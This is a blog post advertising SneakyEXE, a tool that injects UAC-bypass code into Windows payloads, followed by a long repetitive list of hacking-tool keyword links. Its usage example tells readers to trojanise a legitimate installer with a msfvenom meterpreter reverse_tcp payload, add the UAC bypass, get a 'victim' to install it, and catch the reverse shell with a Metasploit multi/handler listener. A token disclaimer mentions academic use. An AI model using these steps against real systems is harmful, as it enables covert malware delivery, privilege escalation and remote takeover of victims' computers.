jueves, 27 de agosto de 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Related articles
  1. Pentest Tools Linux
  2. Hack Apps
  3. Hack App
  4. Hack Tool Apk
  5. Pentest Tools Android
  6. Github Hacking Tools
  7. Hacker Tools Software
  8. Pentest Tools Windows
  9. Tools 4 Hack
  10. Install Pentest Tools Ubuntu
  11. Hacker Tools 2020
  12. Hacker Tools Software
  13. Usb Pentest Tools
  14. Ethical Hacker Tools
  15. Hacking Apps
  16. Hacker Tools For Windows
  17. Hacking Tools Usb
  18. Hacker Tools Hardware
  19. Tools For Hacker
  20. How To Install Pentest Tools In Ubuntu
  21. Underground Hacker Sites
  22. New Hacker Tools
  23. Best Hacking Tools 2020
  24. Hacker Tools Apk Download
  25. Github Hacking Tools
  26. Hack Tools 2019
  27. New Hack Tools
  28. Hacking Tools Online
  29. Hack App
  30. Pentest Tools Port Scanner
  31. Hacking Tools 2020
  32. New Hacker Tools
  33. Underground Hacker Sites
  34. Tools For Hacker
  35. How To Install Pentest Tools In Ubuntu
  36. Github Hacking Tools
  37. Free Pentest Tools For Windows
  38. Hacking Tools Download
  39. Pentest Reporting Tools
  40. Hacking Tools Free Download
  41. Pentest Tools Find Subdomains
  42. Hacking Tools Free Download
  43. Pentest Tools For Android
  44. Hacking Tools For Games
  45. Computer Hacker
  46. Hacker Tools Windows
  47. How To Install Pentest Tools In Ubuntu
  48. Blackhat Hacker Tools
  49. Hack Tools Pc
  50. Free Pentest Tools For Windows
  51. Hak5 Tools
  52. Hacking Tools Github
  53. Pentest Tools Subdomain
  54. Android Hack Tools Github
  55. Hack Tools 2019
  56. Pentest Tools Online
  57. Hacker Tools Apk Download
  58. Best Pentesting Tools 2018
  59. Pentest Tools Online
  60. Hack Tool Apk
  61. Nsa Hack Tools
  62. Pentest Tools Framework
  63. Pentest Tools For Windows
  64. Hacker Tool Kit
  65. Hacker Tools For Ios
  66. Pentest Box Tools Download
  67. Hack Website Online Tool
  68. Underground Hacker Sites
  69. Hacker Tools For Windows
  70. Hacker Tools Github
  71. Pentest Tools List
  72. Hacker Tools Free
  73. Hacking Tools And Software
  74. Hack And Tools
  75. Hack Rom Tools
  76. Tools Used For Hacking
  77. How To Install Pentest Tools In Ubuntu
  78. Hacker Tools Linux
  79. Pentest Tools Windows
  80. Nsa Hacker Tools
  81. Pentest Tools Github
  82. Hack Tools Pc
  83. Pentest Tools Nmap
  84. Hack App
  85. Best Pentesting Tools 2018
  86. Hacking Tools For Kali Linux
  87. Tools Used For Hacking
  88. Pentest Tools Subdomain
  89. Hacker Tools Apk
  90. Tools 4 Hack
  91. Hack Tools Pc
  92. Pentest Tools Free
  93. Nsa Hack Tools Download
  94. Pentest Tools For Windows
  95. Hacking Tools And Software
  96. Game Hacking
  97. Tools 4 Hack
  98. Wifi Hacker Tools For Windows
  99. Hack App
  100. Blackhat Hacker Tools
  101. Hack Rom Tools
  102. Hack Apps
  103. Github Hacking Tools
  104. Hacker Tool Kit
  105. Hacking Tools For Pc
  106. Wifi Hacker Tools For Windows
  107. World No 1 Hacker Software
  108. Hacking Tools
  109. Pentest Tools Subdomain
  110. Pentest Reporting Tools
  111. Hacking Tools Usb
  112. Kik Hack Tools
  113. Hacking Tools For Games
  114. What Are Hacking Tools
  115. What Is Hacking Tools
  116. Pentest Tools Open Source
  117. Pentest Tools Framework
  118. Hacker Tool Kit
  119. Hack Tool Apk No Root
  120. Hack Tools Download
  121. Hackrf Tools
  122. Hack App
  123. Bluetooth Hacking Tools Kali

No hay comentarios:

Archivo del blog

Datos personales